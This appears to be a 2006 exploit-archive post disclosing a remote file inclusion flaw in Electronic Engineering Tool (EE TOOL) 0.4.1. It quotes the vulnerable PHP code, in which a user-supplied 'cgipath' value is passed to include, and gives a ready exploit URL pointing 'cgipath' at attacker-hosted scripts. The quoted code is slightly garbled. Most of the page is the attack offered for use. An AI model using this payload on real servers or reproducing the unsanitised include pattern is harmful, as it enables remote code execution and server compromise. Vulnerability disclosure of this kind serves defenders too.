Electronic Engineering Tool (EE TOOL) <= 0.4.1 File Include Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Electronic Engineering Tool (EE TOOL) <= 0.4.1 File Include Vulnerability
# Published : 2006-10-28
# Author : xoron
# Previous Title : mp3SDS 3.0 (Core/core.inc.php) Remote File Include Vulnerability
# Next Title : MiraksGalerie <= 2.62 (pcltar.lib.php) Remote File Include Exploit

Script Download: http://kent.dl.sourceforge.net/sourceforge/eetool/eetool-0.4-1.tar.gz
 
Code: if($type == 1) { $url = "$cgipath" . "ipcalc.cgi"; } else {
$url = "$cgipath" . "ipcalc.cgi?host=$host&mask1=$mask1&mask2=$mask2";
}nclude("$url");
 
Exploit:www.target.com/ip.inc.php?type=1&cgipath=evilscripts
 
Found: Cyber-Security
 
Thanx: DJR, xoron, K@OS, trampfd, Konaksinamon, KripteX, sakkure, Seyfullah, MaSSiMo, Kano, whiteguide

# www.Syue.com [2006-10-28]